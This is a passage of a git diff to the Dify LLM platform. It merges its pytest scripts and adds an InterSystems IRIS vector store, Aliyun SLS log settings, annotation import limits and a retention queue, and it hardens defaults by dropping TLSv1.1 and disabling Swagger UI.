+ +PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-180}" + +# Ensure OpenDAL local storage works even if .env isn't loaded +export STORAGE_TYPE=${STORAGE_TYPE:-opendal} +export OPENDAL_SCHEME=${OPENDAL_SCHEME:-fs} +export OPENDAL_FS_ROOT=${OPENDAL_FS_ROOT:-/tmp/dify-storage} +mkdir -p "${OPENDAL_FS_ROOT}" + +# Prepare env files like CI +cp -n docker/.env.example docker/.env || true +cp -n docker/middleware.env.example docker/middleware.env || true +cp -n api/tests/integration_tests/.env.example api/tests/integration_tests/.env || true + +# Expose service ports (same as CI) without leaving the repo dirty +EXPOSE_BACKUPS=() +for f in docker/docker-compose.yaml docker/tidb/docker-compose.yaml; do + if [[ -f "$f" ]]; then + cp "$f" "$f.ci.bak" + EXPOSE_BACKUPS+=("$f") + fi +done +if command -v yq >/dev/null 2>&1; then + sh .github/workflows/expose_service_ports.sh || true +else + echo "skip expose_service_ports (yq not installed)" >&2 +fi + +# Optionally start middleware stack (db, redis, sandbox, ssrf proxy) to mirror CI +STARTED_MIDDLEWARE=0 +if [[ "${SKIP_MIDDLEWARE:-0}" != "1" ]]; then + docker compose -f docker/docker-compose.middleware.yaml --env-file docker/middleware.env up -d db_postgres redis sandbox ssrf_proxy + STARTED_MIDDLEWARE=1 + # Give services a moment to come up + sleep 5 +fi + +cleanup() { + if [[ $STARTED_MIDDLEWARE -eq 1 ]]; then + docker compose -f docker/docker-compose.middleware.yaml --env-file docker/middleware.env down + fi + for f in "${EXPOSE_BACKUPS[@]}"; do + mv "$f.ci.bak" "$f" + done +} +trap cleanup EXIT + +pytest --timeout "${PYTEST_TIMEOUT}" \ + api/tests/integration_tests/workflow \ + api/tests/integration_tests/tools \ + api/tests/test_containers_integration_tests \ + api/tests/unit_tests diff --git a/dev/pytest/pytest_model_runtime.sh b/dev/pytest/pytest_model_runtime.sh deleted file mode 100755 index fd68dbe697..0000000000 --- a/dev/pytest/pytest_model_runtime.sh +++ /dev/null @@ -1,18 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname 
"$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-180}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/integration_tests/model_runtime/anthropic \ - api/tests/integration_tests/model_runtime/azure_openai \ - api/tests/integration_tests/model_runtime/openai api/tests/integration_tests/model_runtime/chatglm \ - api/tests/integration_tests/model_runtime/google api/tests/integration_tests/model_runtime/xinference \ - api/tests/integration_tests/model_runtime/huggingface_hub/test_llm.py \ - api/tests/integration_tests/model_runtime/upstage \ - api/tests/integration_tests/model_runtime/fireworks \ - api/tests/integration_tests/model_runtime/nomic \ - api/tests/integration_tests/model_runtime/mixedbread \ - api/tests/integration_tests/model_runtime/voyage diff --git a/dev/pytest/pytest_testcontainers.sh b/dev/pytest/pytest_testcontainers.sh deleted file mode 100755 index f92f8821bf..0000000000 --- a/dev/pytest/pytest_testcontainers.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/test_containers_integration_tests diff --git a/dev/pytest/pytest_tools.sh b/dev/pytest/pytest_tools.sh deleted file mode 100755 index 989784f078..0000000000 --- a/dev/pytest/pytest_tools.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/integration_tests/tools diff --git a/dev/pytest/pytest_workflow.sh b/dev/pytest/pytest_workflow.sh deleted file mode 100755 index 941c8d3e7e..0000000000 --- a/dev/pytest/pytest_workflow.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." 
- -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/integration_tests/workflow diff --git a/dev/start-worker b/dev/start-worker index a01da11d86..7876620188 100755 --- a/dev/start-worker +++ b/dev/start-worker @@ -37,6 +37,7 @@ show_help() { echo " pipeline - Standard pipeline tasks" echo " triggered_workflow_dispatcher - Trigger dispatcher tasks" echo " trigger_refresh_executor - Trigger refresh tasks" + echo " retention - Retention tasks" } # Parse command line arguments @@ -105,10 +106,10 @@ if [[ -z "${QUEUES}" ]]; then # Configure queues based on edition if [[ "${EDITION}" == "CLOUD" ]]; then # Cloud edition: separate queues for dataset and trigger tasks - QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow_professional,workflow_team,workflow_sandbox,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor" + QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow_professional,workflow_team,workflow_sandbox,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention" else # Community edition (SELF_HOSTED): dataset and workflow have separate queues - QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor" + QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention" fi echo "No queues specified, using edition-based defaults: ${QUEUES}" diff --git a/docker/.env.example b/docker/.env.example index 04088b72a8..e5cdb64dae 100644 --- a/docker/.env.example +++ 
b/docker/.env.example @@ -518,7 +518,7 @@ SUPABASE_URL=your-server-url # ------------------------------ # The type of vector store to use. -# Supported values are `weaviate`, `oceanbase`, `qdrant`, `milvus`, `myscale`, `relyt`, `pgvector`, `pgvecto-rs`, `chroma`, `opensearch`, `oracle`, `tencent`, `elasticsearch`, `elasticsearch-ja`, `analyticdb`, `couchbase`, `vikingdb`, `opengauss`, `tablestore`,`vastbase`,`tidb`,`tidb_on_qdrant`,`baidu`,`lindorm`,`huawei_cloud`,`upstash`, `matrixone`, `clickzetta`, `alibabacloud_mysql`. +# Supported values are `weaviate`, `oceanbase`, `qdrant`, `milvus`, `myscale`, `relyt`, `pgvector`, `pgvecto-rs`, `chroma`, `opensearch`, `oracle`, `tencent`, `elasticsearch`, `elasticsearch-ja`, `analyticdb`, `couchbase`, `vikingdb`, `opengauss`, `tablestore`,`vastbase`,`tidb`,`tidb_on_qdrant`,`baidu`,`lindorm`,`huawei_cloud`,`upstash`, `matrixone`, `clickzetta`, `alibabacloud_mysql`, `iris`. VECTOR_STORE=weaviate # Prefix used to create collection name in vector database VECTOR_INDEX_NAME_PREFIX=Vector_index @@ -792,6 +792,21 @@ CLICKZETTA_ANALYZER_TYPE=chinese CLICKZETTA_ANALYZER_MODE=smart CLICKZETTA_VECTOR_DISTANCE_FUNCTION=cosine_distance +# InterSystems IRIS configuration, only available when VECTOR_STORE is `iris` +IRIS_HOST=iris +IRIS_SUPER_SERVER_PORT=1972 +IRIS_WEB_SERVER_PORT=52773 +IRIS_USER=_SYSTEM +IRIS_PASSWORD=Dify@1234 +IRIS_DATABASE=USER +IRIS_SCHEMA=dify +IRIS_CONNECTION_URL= +IRIS_MIN_CONNECTION=1 +IRIS_MAX_CONNECTION=3 +IRIS_TEXT_INDEX=true +IRIS_TEXT_INDEX_LANGUAGE=en +IRIS_TIMEZONE=UTC + # ------------------------------ # Knowledge Configuration # ------------------------------ @@ -1029,6 +1044,25 @@ WORKFLOW_LOG_RETENTION_DAYS=30 # Batch size for workflow log cleanup operations (default: 100) WORKFLOW_LOG_CLEANUP_BATCH_SIZE=100 +# Aliyun SLS Logstore Configuration +# Aliyun Access Key ID +ALIYUN_SLS_ACCESS_KEY_ID= +# Aliyun Access Key Secret +ALIYUN_SLS_ACCESS_KEY_SECRET= +# Aliyun SLS Endpoint (e.g., 
cn-hangzhou.log.aliyuncs.com) +ALIYUN_SLS_ENDPOINT= +# Aliyun SLS Region (e.g., cn-hangzhou) +ALIYUN_SLS_REGION= +# Aliyun SLS Project Name +ALIYUN_SLS_PROJECT_NAME= +# Number of days to retain workflow run logs (default: 365 days, 3650 for permanent storage) +ALIYUN_SLS_LOGSTORE_TTL=365 +# Enable dual-write to both SLS LogStore and SQL database (default: false) +LOGSTORE_DUAL_WRITE_ENABLED=false +# Enable dual-read fallback to SQL database when LogStore returns no results (default: true) +# Useful for migration scenarios where historical data exists only in SQL database +LOGSTORE_DUAL_READ_ENABLED=true + # HTTP request node in workflow configuration HTTP_REQUEST_NODE_MAX_BINARY_SIZE=10485760 HTTP_REQUEST_NODE_MAX_TEXT_SIZE=1048576 @@ -1214,7 +1248,7 @@ NGINX_SSL_PORT=443 # and modify the env vars below accordingly. NGINX_SSL_CERT_FILENAME=dify.crt NGINX_SSL_CERT_KEY_FILENAME=dify.key -NGINX_SSL_PROTOCOLS=TLSv1.1 TLSv1.2 TLSv1.3 +NGINX_SSL_PROTOCOLS=TLSv1.2 TLSv1.3 # Nginx performance tuning NGINX_WORKER_PROCESSES=auto @@ -1335,7 +1369,10 @@ PLUGIN_STDIO_BUFFER_SIZE=1024 PLUGIN_STDIO_MAX_BUFFER_SIZE=5242880 PLUGIN_PYTHON_ENV_INIT_TIMEOUT=120 +# Plugin Daemon side timeout (configure to match the API side below) PLUGIN_MAX_EXECUTION_TIMEOUT=600 +# API side timeout (configure to match the Plugin Daemon side above) +PLUGIN_DAEMON_TIMEOUT=600.0 # PIP_MIRROR_URL=https://pypi.tuna.tsinghua.edu.cn/simple PIP_MIRROR_URL= @@ -1406,7 +1443,7 @@ QUEUE_MONITOR_ALERT_EMAILS= QUEUE_MONITOR_INTERVAL=30 # Swagger UI configuration -SWAGGER_UI_ENABLED=true +SWAGGER_UI_ENABLED=false SWAGGER_UI_PATH=/swagger-ui.html # Whether to encrypt dataset IDs when exporting DSL files (default: true) @@ -1433,5 +1470,21 @@ WORKFLOW_SCHEDULE_MAX_DISPATCH_PER_TICK=0 # Tenant isolated task queue configuration TENANT_ISOLATED_TASK_CONCURRENCY=1 +# Maximum allowed CSV file size for annotation import in megabytes +ANNOTATION_IMPORT_FILE_SIZE_LIMIT=2 +#Maximum number of annotation records allowed in a 
single import +ANNOTATION_IMPORT_MAX_RECORDS=10000 +# Minimum number of annotation records required in a single import +ANNOTATION_IMPORT_MIN_RECORDS=1 +ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE=5 +ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR=20 +# Maximum number of concurrent annotation import tasks per tenant +ANNOTATION_IMPORT_MAX_CONCURRENT=5 + # The API key of amplitude AMPLITUDE_API_KEY= + +# Sandbox expired records clean configuration +SANDBOX_EXPIRED_RECORDS_CLEAN_GRACEFUL_PERIOD=21 +SANDBOX_EXPIRED_RECORDS_CLEAN_BATCH_SIZE=1000 +SANDBOX_EXPIRED_RECORDS_RETENTION_DAYS=30 diff --git a/docker/docker-compose-template.yaml b/docker/docker-compose-template.yaml index c89224fa8a..a07ed9e8ad 100644 --- a/docker/docker-compose-template.yaml +++ b/docker/docker-compose-template.yaml @@ -21,7 +21,7 @@ services: # API service api: - image: langgenius/dify-api:1.11.0 + image: langgenius/dify-api:1.11.1 restart: always environment: # Use the shared environment variables. @@ -34,6 +34,7 @@ services: PLUGIN_REMOTE_INSTALL_HOST: ${EXPOSE_PLUGIN_DEBUGGING_HOST:-localhost} PLUGIN_REMOTE_INSTALL_PORT: ${EXPOSE_PLUGIN_DEBUGGING_PORT:-5003} PLUGIN_MAX_PACKAGE_SIZE: ${PLUGIN_MAX_PACKAGE_SIZE:-52428800} + PLUGIN_DAEMON_TIMEOUT: ${PLUGIN_DAEMON_TIMEOUT:-600.0} INNER_API_KEY_FOR_PLUGIN: ${PLUGIN_DIFY_INNER_API_KEY:-QaHbTe77CtuXmsfyhR7+vRjI/+XbV1AaFy691iy+kGDv2Jvy0/eAh8Y1} depends_on: init_permissions: @@ -62,7 +63,7 @@ services: # worker service # The Celery worker for processing all queues (dataset, workflow, mail, etc.) worker: - image: langgenius/dify-api:1.11.0 + image: langgenius/dify-api:1.11.1 restart: always environment: # Use the shared environment variables. @@ -101,7 +102,7 @@ services: # worker_beat service # Celery beat for scheduling periodic tasks. worker_beat: - image: langgenius/dify-api:1.11.0 + image: langgenius/dify-api:1.11.1 restart: always environment: # Use the shared environment variables. @@ -131,7 +132,7 @@ services: # Frontend web application. 
web: - image: langgenius/dify-web:1.11.0 + image: langgenius/dify-web:1.11.1 restart: always environment: CONSOLE_API_URL: ${CONSOLE_API_URL:-} @@ -414,7 +415,7 @@ services: # and modify the env vars below in .env if HTTPS_ENABLED is true. NGINX_SSL_CERT_FILENAME: ${NGINX_SSL_CERT_FILENAME:-dify.crt} NGINX_SSL_CERT_KEY_FILENAME: ${NGINX_SSL_CERT_KEY_FILENAME:-dify.key} - NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.1 TLSv1.2 TLSv1.3} + NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.2 TLSv1.3} NGINX_WORKER_PROCESSES: ${NGINX_WORKER_PROCESSES:-auto} NGINX_CLIENT_MAX_BODY_SIZE: ${NGINX_CLIENT_MAX_BODY_SIZE:-100M} NGINX_KEEPALIVE_TIMEOUT: ${NGINX_KEEPALIVE_TIMEOUT:-65} @@ -648,6 +649,26 @@ services: CHROMA_SERVER_AUTHN_PROVIDER: ${CHROMA_SERVER_AUTHN_PROVIDER:-chromadb.auth.token_authn.TokenAuthenticationServerProvider} IS_PERSISTENT: ${CHROMA_IS_PERSISTENT:-TRUE} + # InterSystems IRIS vector database + iris: + image: containers.intersystems.com/intersystems/iris-community:2025.3 + profiles: + - iris + container_name: iris + restart: always + init: true + ports: + - "${IRIS_SUPER_SERVER_PORT:-1972}:1972" + - "${IRIS_WEB_SERVER_PORT:-52773}:52773" + volumes: + - ./volumes/iris:/opt/iris + - ./iris/iris-init.script:/iris-init.script + - ./iris/docker-entrypoint.sh:/custom-entrypoint.sh + entrypoint: ["/custom-entrypoint.sh"] + tty: true + environment: + TZ: ${IRIS_TIMEZONE:-UTC} + # Oracle vector database oracle: image: container-registry.oracle.com/database/free:latest diff --git a/docker/docker-compose.yaml b/docker/docker-compose.yaml index 68f5726797..24e1077ebe 100644 --- a/docker/docker-compose.yaml +++ b/docker/docker-compose.yaml @@ -361,6 +361,19 @@ x-shared-env: &shared-api-worker-env CLICKZETTA_ANALYZER_TYPE: ${CLICKZETTA_ANALYZER_TYPE:-chinese} CLICKZETTA_ANALYZER_MODE: ${CLICKZETTA_ANALYZER_MODE:-smart} CLICKZETTA_VECTOR_DISTANCE_FUNCTION: ${CLICKZETTA_VECTOR_DISTANCE_FUNCTION:-cosine_distance} + IRIS_HOST: ${IRIS_HOST:-iris} + 
IRIS_SUPER_SERVER_PORT: ${IRIS_SUPER_SERVER_PORT:-1972} + IRIS_WEB_SERVER_PORT: ${IRIS_WEB_SERVER_PORT:-52773} + IRIS_USER: ${IRIS_USER:-_SYSTEM} + IRIS_PASSWORD: ${IRIS_PASSWORD:-Dify@1234} + IRIS_DATABASE: ${IRIS_DATABASE:-USER} + IRIS_SCHEMA: ${IRIS_SCHEMA:-dify} + IRIS_CONNECTION_URL: ${IRIS_CONNECTION_URL:-} + IRIS_MIN_CONNECTION: ${IRIS_MIN_CONNECTION:-1} + IRIS_MAX_CONNECTION: ${IRIS_MAX_CONNECTION:-3} + IRIS_TEXT_INDEX: ${IRIS_TEXT_INDEX:-true} + IRIS_TEXT_INDEX_LANGUAGE: ${IRIS_TEXT_INDEX_LANGUAGE:-en} + IRIS_TIMEZONE: ${IRIS_TIMEZONE:-UTC} UPLOAD_FILE_SIZE_LIMIT: ${UPLOAD_FILE_SIZE_LIMIT:-15} UPLOAD_FILE_BATCH_LIMIT: ${UPLOAD_FILE_BATCH_LIMIT:-5} UPLOAD_FILE_EXTENSION_BLACKLIST: ${UPLOAD_FILE_EXTENSION_BLACKLIST:-} @@ -442,6 +455,14 @@ x-shared-env: &shared-api-worker-env WORKFLOW_LOG_CLEANUP_ENABLED: ${WORKFLOW_LOG_CLEANUP_ENABLED:-false} WORKFLOW_LOG_RETENTION_DAYS: ${WORKFLOW_LOG_RETENTION_DAYS:-30} WORKFLOW_LOG_CLEANUP_BATCH_SIZE: ${WORKFLOW_LOG_CLEANUP_BATCH_SIZE:-100} + ALIYUN_SLS_ACCESS_KEY_ID: ${ALIYUN_SLS_ACCESS_KEY_ID:-} + ALIYUN_SLS_ACCESS_KEY_SECRET: ${ALIYUN_SLS_ACCESS_KEY_SECRET:-} + ALIYUN_SLS_ENDPOINT: ${ALIYUN_SLS_ENDPOINT:-} + ALIYUN_SLS_REGION: ${ALIYUN_SLS_REGION:-} + ALIYUN_SLS_PROJECT_NAME: ${ALIYUN_SLS_PROJECT_NAME:-} + ALIYUN_SLS_LOGSTORE_TTL: ${ALIYUN_SLS_LOGSTORE_TTL:-365} + LOGSTORE_DUAL_WRITE_ENABLED: ${LOGSTORE_DUAL_WRITE_ENABLED:-false} + LOGSTORE_DUAL_READ_ENABLED: ${LOGSTORE_DUAL_READ_ENABLED:-true} HTTP_REQUEST_NODE_MAX_BINARY_SIZE: ${HTTP_REQUEST_NODE_MAX_BINARY_SIZE:-10485760} HTTP_REQUEST_NODE_MAX_TEXT_SIZE: ${HTTP_REQUEST_NODE_MAX_TEXT_SIZE:-1048576} HTTP_REQUEST_NODE_SSL_VERIFY: ${HTTP_REQUEST_NODE_SSL_VERIFY:-True} @@ -515,7 +536,7 @@ x-shared-env: &shared-api-worker-env NGINX_SSL_PORT: ${NGINX_SSL_PORT:-443} NGINX_SSL_CERT_FILENAME: ${NGINX_SSL_CERT_FILENAME:-dify.crt} NGINX_SSL_CERT_KEY_FILENAME: ${NGINX_SSL_CERT_KEY_FILENAME:-dify.key} - NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.1 TLSv1.2 TLSv1.3} + 
NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.2 TLSv1.3} NGINX_WORKER_PROCESSES: ${NGINX_WORKER_PROCESSES:-auto} NGINX_CLIENT_MAX_BODY_SIZE: ${NGINX_CLIENT_MAX_BODY_SIZE:-100M} NGINX_KEEPALIVE_TIMEOUT: ${NGINX_KEEPALIVE_TIMEOUT:-65} @@ -570,6 +591,7 @@ x-shared-env: &shared-api-worker-env PLUGIN_STDIO_MAX_BUFFER_SIZE: ${PLUGIN_STDIO_MAX_BUFFER_SIZE:-5242880} PLUGIN_PYTHON_ENV_INIT_TIMEOUT: ${PLUGIN_PYTHON_ENV_INIT_TIMEOUT:-120} PLUGIN_MAX_EXECUTION_TIMEOUT: ${PLUGIN_MAX_EXECUTION_TIMEOUT:-600} + PLUGIN_DAEMON_TIMEOUT: ${PLUGIN_DAEMON_TIMEOUT:-600.0} PIP_MIRROR_URL: ${PIP_MIRROR_URL:-} PLUGIN_STORAGE_TYPE: ${PLUGIN_STORAGE_TYPE:-local} PLUGIN_STORAGE_LOCAL_ROOT: ${PLUGIN_STORAGE_LOCAL_ROOT:-/app/storage} @@ -618,7 +640,7 @@ x-shared-env: &shared-api-worker-env QUEUE_MONITOR_THRESHOLD: ${QUEUE_MONITOR_THRESHOLD:-200} QUEUE_MONITOR_ALERT_EMAILS: ${QUEUE_MONITOR_ALERT_EMAILS:-} QUEUE_MONITOR_INTERVAL: ${QUEUE_MONITOR_INTERVAL:-30} - SWAGGER_UI_ENABLED: ${SWAGGER_UI_ENABLED:-true} + SWAGGER_UI_ENABLED: ${SWAGGER_UI_ENABLED:-false} SWAGGER_UI_PATH: ${SWAGGER_UI_PATH:-/swagger-ui.html} DSL_EXPORT_ENCRYPT_DATASET_ID: ${DSL_EXPORT_ENCRYPT_DATASET_ID:-true} DATASET_MAX_SEGMENTS_PER_REQUEST: ${DATASET_MAX_SEGMENTS_PER_REQUEST:-0} @@ -635,7 +657,16 @@ x-shared-env: &shared-api-worker-env WORKFLOW_SCHEDULE_POLLER_BATCH_SIZE: ${WORKFLOW_SCHEDULE_POLLER_BATCH_SIZE:-100} WORKFLOW_SCHEDULE_MAX_DISPATCH_PER_TICK: ${WORKFLOW_SCHEDULE_MAX_DISPATCH_PER_TICK:-0} TENANT_ISOLATED_TASK_CONCURRENCY: ${TENANT_ISOLATED_TASK_CONCURRENCY:-1} + ANNOTATION_IMPORT_FILE_SIZE_LIMIT: ${ANNOTATION_IMPORT_FILE_SIZE_LIMIT:-2} + ANNOTATION_IMPORT_MAX_RECORDS: ${ANNOTATION_IMPORT_MAX_RECORDS:-10000} + ANNOTATION_IMPORT_MIN_RECORDS: ${ANNOTATION_IMPORT_MIN_RECORDS:-1} + ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: ${ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE:-5} + ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: ${ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR:-20} + ANNOTATION_IMPORT_MAX_CONCURRENT: 
${ANNOTATION_IMPORT_MAX_CONCURRENT:-5} AMPLITUDE_API_KEY: ${AMPLITUDE_API_KEY:-} + SANDBOX_EXPIRED_RECORDS_CLEAN_GRACEFUL_PERIOD: ${SANDBOX_EXPIRED_RECORDS_CLEAN_GRACEFUL_PERIOD:-21} + SANDBOX_EXPIRED_RECORDS_CLEAN_BATCH_SIZE: ${SANDBOX_EXPIRED_RECORDS_CLEAN_BATCH_SIZE:-1000} + SANDBOX_EXPIRED_RECORDS_RETENTION_DAYS: ${SANDBOX_EXPIRED_RECORDS_RETENTION_DAYS:-30} services: # Init container to fix permissions @@ -659,7 +690,7 @@ services: # API service api: - image: langgenius/dify-api:1.11.0 + image: langgenius/dify-api:1.11.1 restart: always environment: # Use the shared environment variables. @@ -672,6 +703,7 @@ services: PLUGIN_REMOTE_INSTALL_HOST: ${EXPOSE_PLUGIN_DEBUGGING_HOST:-localhost} PLUGIN_REMOTE_INSTALL_PORT: ${EXPOSE_PLUGIN_DEBUGGING_PORT:-5003} PLUGIN_MAX_PACKAGE_SIZE: ${PLUGIN_MAX_PACKAGE_SIZE:-52428800} + PLUGIN_DAEMON_TIMEOUT: ${PLUGIN_DAEMON_TIMEOUT:-600.0} INNER_API_KEY_FOR_PLUGIN: ${PLUGIN_DIFY_INNER_API_KEY:-QaHbTe77CtuXmsfyhR7+vRjI/+XbV1AaFy691iy+kGDv2Jvy0/eAh8Y1} depends_on: init_permissions: @@ -700,7 +732,7 @@ services: # worker service # The Celery worker for processing all queues (dataset, workflow, mail, etc.) worker: - image: langgenius/dify-api:1.11.0 + image: langgenius/dify-api:1.11.1 restart: always environment: # Use the shared environment variables. @@ -739,7 +771,7 @@ services: # worker_beat service # Celery beat for scheduling periodic tasks. worker_beat: - image: langgenius/dify-api:1.11.0 + image: langgenius/dify-api:1.11.1 restart: always environment: # Use the shared environment variables. @@ -769,7 +801,7 @@ services: # Frontend web application. web: - image: langgenius/dify-web:1.11.0 + image: langgenius/dify-web:1.11.1 restart: always environment: CONSOLE_API_URL: ${CONSOLE_API_URL:-} @@ -1052,7 +1084,7 @@ services: # and modify the env vars below in .env if HTTPS_ENABLED is true. 
NGINX_SSL_CERT_FILENAME: ${NGINX_SSL_CERT_FILENAME:-dify.crt} NGINX_SSL_CERT_KEY_FILENAME: ${NGINX_SSL_CERT_KEY_FILENAME:-dify.key} - NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.1 TLSv1.2 TLSv1.3} + NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.2 TLSv1.3} NGINX_WORKER_PROCESSES: ${NGINX_WORKER_PROCESSES:-auto} NGINX_CLIENT_MAX_BODY_SIZE: ${NGINX_CLIENT_MAX_BODY_SIZE:-100M} NGINX_KEEPALIVE_TIMEOUT: ${NGINX_KEEPALIVE_TIMEOUT:-65} @@ -1286,6 +1318,26 @@ services: CHROMA_SERVER_AUTHN_PROVIDER: ${CHROMA_SERVER_AUTHN_PROVIDER:-chromadb.auth.token_authn.TokenAuthenticationServerProvider} IS_PERSISTENT: ${CHROMA_IS_PERSISTENT:-TRUE} + # InterSystems IRIS vector database + iris: + image: containers.intersystems.com/intersystems/iris-community:2025.3 + profiles: + - iris + container_name: iris + restart: always + init: true + ports: + - "${IRIS_SUPER_SERVER_PORT:-1972}:1972" + - "${IRIS_WEB_SERVER_PORT:-52773}:52773" + volumes: + - ./volumes/iris:/opt/iris + - ./iris/iris-init.script:/iris-init.script + - ./iris/docker-entrypoint.sh:/custom-entrypoint.sh + entrypoint: ["/custom-entrypoint.sh"] + tty: true + environment: + TZ: ${IRIS_TIMEZONE:-UTC} + # Oracle vector database oracle: image: container-registry.oracle.com/database/free:latest diff --git a/docker/iris/docker-entrypoint.sh b/docker/iris/docker-entrypoint.sh new file mode 100755 index 0000000000..067bfa03e2 --- /dev/null +++ b/docker/iris/docker-entrypoint.sh @@ -0,0 +1,38 @@ +#!/bin/bash +set -e + +# IRIS configuration flag file +IRIS_CONFIG_DONE="/opt/iris/.iris-configured" + +# Function to configure IRIS +configure_iris() { + echo "Configuring IRIS for first-time setup..." + + # Wait for IRIS to be fully started + sleep 5 + + # Execute the initialization script + iris session IRIS < /iris-init.script + + # Mark configuration as done + touch "$IRIS_CONFIG_DONE" + + echo "IRIS configuration completed." +} + +# Start IRIS in background for initial configuration if not already configured +if [ ! 
-f "$IRIS_CONFIG_DONE" ]; then + echo "First-time IRIS setup detected. Starting IRIS for configuration..." + + # Start IRIS + iris start IRIS + + # Configure IRIS + configure_iris + + # Stop IRIS + iris stop IRIS quietly +fi + +# Run the original IRIS entrypoint +exec /iris-main "$@" diff --git a/docker/iris/iris-init.script b/docker/iris/iris-init.script new file mode 100644 index 0000000000..c41fcf4efb --- /dev/null +++ b/docker/iris/iris-init.script @@ -0,0 +1,11 @@ +// Switch to the %SYS namespace to modify system settings +set $namespace="%SYS" + +// Set predefined user passwords to never expire (default password: SYS) +Do ##class(Security.Users).UnExpireUserPasswords("*") + +// Change the default password  +Do $SYSTEM.Security.ChangePassword("_SYSTEM","Dify@1234") + +// Install the Japanese locale (default is English since the container is Ubuntu-based) +// Do ##class(Config.NLS.Locales).Install("jpuw") diff --git a/docker/middleware.env.example b/docker/middleware.env.example index d4cbcd1762..f7e0252a6f 100644 --- a/docker/middleware.env.example +++ b/docker/middleware.env.example @@ -213,3 +213,24 @@ PLUGIN_VOLCENGINE_TOS_ENDPOINT= PLUGIN_VOLCENGINE_TOS_ACCESS_KEY= PLUGIN_VOLCENGINE_TOS_SECRET_KEY= PLUGIN_VOLCENGINE_TOS_REGION= + +# ------------------------------ +# Environment Variables for Aliyun SLS (Simple Log Service) +# ------------------------------ +# Aliyun SLS Access Key ID +ALIYUN_SLS_ACCESS_KEY_ID= +# Aliyun SLS Access Key Secret +ALIYUN_SLS_ACCESS_KEY_SECRET= +# Aliyun SLS Endpoint (e.g., cn-hangzhou.log.aliyuncs.com) +ALIYUN_SLS_ENDPOINT= +# Aliyun SLS Region (e.g., cn-hangzhou) +ALIYUN_SLS_REGION= +# Aliyun SLS Project Name +ALIYUN_SLS_PROJECT_NAME= +# Aliyun SLS Logstore TTL (default: 365 days, 3650 for permanent storage) +ALIYUN_SLS_LOGSTORE_TTL=365 +# Enable dual-write to both LogStore and SQL database (default: true) +LOGSTORE_DUAL_WRITE_ENABLED=true +# Enable dual-read fallback to SQL database when LogStore returns no results (default: 
true) +# Useful for migration scenarios where historical data exists only in SQL database +LOGSTORE_DUAL_READ_ENABLED=true \ No newline at end of file diff --git a/docs/fr-FR/README.md b/docs/fr-FR/README.md index 03f3221798..291c8dab40 100644 --- a/docs/fr-FR/README.md +++ b/docs/fr-FR/README.md @@ -61,14 +61,14 @@

langgenius%2Fdify | Trendshift

-Dify est une plateforme de développement d'applications LLM open source. Son interface intuitive combine un flux de travail d'IA, un pipeline RAG, des capacités d'agent, une gestion de modèles, des fonctionnalités d'observabilité, et plus encore, vous permettant de passer rapidement du prototype à la production. Voici une liste des fonctionnalités principales: +Dify est une plateforme de développement d'applications LLM open source. Son interface intuitive combine un flux de travail d'IA, un pipeline RAG, des capacités d'agent, une gestion de modèles, des fonctionnalités d'observabilité, et plus encore, vous permettant de passer rapidement du prototype à la production. Voici une liste des fonctionnalités principales:

**1. Flux de travail** : Construisez et testez des flux de travail d'IA puissants sur un canevas visuel, en utilisant toutes les fonctionnalités suivantes et plus encore. **2. Prise en charge complète des modèles** : -Intégration transparente avec des centaines de LLM propriétaires / open source provenant de dizaines de fournisseurs d'inférence et de solutions auto-hébergées, couvrant GPT, Mistral, Llama3, et tous les modèles compatibles avec l'API OpenAI. Une liste complète des fournisseurs de modèles pris en charge se trouve [ici](https://docs.dify.ai/getting-started/readme/model-providers). +Intégration transparente avec des centaines de LLM propriétaires / open source offerts par des dizaines de fournisseurs d'inférence et de solutions auto-hébergées, couvrant GPT, Mistral, Llama3, et tous les modèles compatibles avec l'API OpenAI. Une liste complète des fournisseurs de modèles pris en charge se trouve 